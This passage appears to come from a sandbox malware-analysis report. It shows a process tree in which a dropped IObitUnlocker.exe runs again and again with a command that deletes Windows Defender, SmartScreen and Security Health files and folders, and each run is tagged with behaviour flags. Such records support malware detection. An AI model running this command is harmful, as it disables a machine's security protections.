defenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1732
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3176
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1124
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5164
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4324
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:3536
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1456
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4352
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5984
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:428
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                            11⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5088
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows